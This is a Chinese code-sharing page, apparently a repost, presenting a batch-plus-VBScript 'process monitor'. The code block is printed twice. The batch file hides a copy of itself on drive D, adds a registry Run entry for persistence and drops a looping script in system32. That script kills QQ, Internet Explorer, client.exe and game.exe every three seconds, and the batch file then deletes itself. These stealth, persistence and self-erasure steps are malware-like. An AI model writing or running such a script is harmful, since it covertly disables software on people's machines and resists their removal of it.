进程监控实现代码[vbs+bat]
程序员文章站
2022-07-04 20:46:55
运行后会在%windir%\system32\目录下生成jk.vbs, 并且自动添加注册表启动项,另外在d:\会生成一个隐藏属性的jk.vbs, 3秒间隔监控进程,如果进程...
运行后会在%windir%\system32\目录下生成jk.vbs,
并且自动添加注册表启动项,另外在d:\会生成一个隐藏属性的jk.vbs,
3秒间隔监控进程,如果进程中有qq.exe、iexplore.exe、client.exe、game.exe进程则会自动结束进程。
@echo off
attrib -s -h -a -r d:\jk.bat 1>nul 2>nul
if exist d:\jk.bat del d:\jk.bat /q
copy %0 d:\jk.bat /y >nul
attrib +s +h +a +r d:\jk.bat
if exist %windir%\system32\jk.vbs del %windir%\system32\jk.vbs
echo y|reg add hklm\software\microsoft\windows\currentversion\run /v data /t reg_sz /d c:\windows\system32\jk.vbs >nul
echo do>>%windir%\system32\jk.vbs
echo wscript.sleep 3000>>%windir%\system32\jk.vbs
echo strcomputer = "." >>%windir%\system32\jk.vbs
echo set objwmiservice = getobject("winmgmts:\\" ^& strcomputer ^& "\root\cimv2") >>%windir%\system32\jk.vbs
echo set colitems = objwmiservice.execquery( _>>%windir%\system32\jk.vbs
echo "select * from win32_process",,48)>>%windir%\system32\jk.vbs
echo for each objitem in colitems >>%windir%\system32\jk.vbs
echo if objitem.name="qq.exe" or objitem.name="iexplore.exe" or _>>%windir%\system32\jk.vbs
echo objitem.name="client.exe" or objitem.name="game.exe" _>>%windir%\system32\jk.vbs
echo then objitem.terminate()>>%windir%\system32\jk.vbs
echo next>>%windir%\system32\jk.vbs
echo loop>>%windir%\system32\jk.vbs
start %windir%\system32\jk.vbs
del %0 /q
并且自动添加注册表启动项,另外在d:\会生成一个隐藏属性的jk.vbs,
3秒间隔监控进程,如果进程中有qq.exe、iexplore.exe、client.exe、game.exe进程则会自动结束进程。
复制代码 代码如下:
@echo off
attrib -s -h -a -r d:\jk.bat 1>nul 2>nul
if exist d:\jk.bat del d:\jk.bat /q
copy %0 d:\jk.bat /y >nul
attrib +s +h +a +r d:\jk.bat
if exist %windir%\system32\jk.vbs del %windir%\system32\jk.vbs
echo y|reg add hklm\software\microsoft\windows\currentversion\run /v data /t reg_sz /d c:\windows\system32\jk.vbs >nul
echo do>>%windir%\system32\jk.vbs
echo wscript.sleep 3000>>%windir%\system32\jk.vbs
echo strcomputer = "." >>%windir%\system32\jk.vbs
echo set objwmiservice = getobject("winmgmts:\\" ^& strcomputer ^& "\root\cimv2") >>%windir%\system32\jk.vbs
echo set colitems = objwmiservice.execquery( _>>%windir%\system32\jk.vbs
echo "select * from win32_process",,48)>>%windir%\system32\jk.vbs
echo for each objitem in colitems >>%windir%\system32\jk.vbs
echo if objitem.name="qq.exe" or objitem.name="iexplore.exe" or _>>%windir%\system32\jk.vbs
echo objitem.name="client.exe" or objitem.name="game.exe" _>>%windir%\system32\jk.vbs
echo then objitem.terminate()>>%windir%\system32\jk.vbs
echo next>>%windir%\system32\jk.vbs
echo loop>>%windir%\system32\jk.vbs
start %windir%\system32\jk.vbs
del %0 /q
上一篇: 和谐富腾称2020年前推出自动驾驶汽车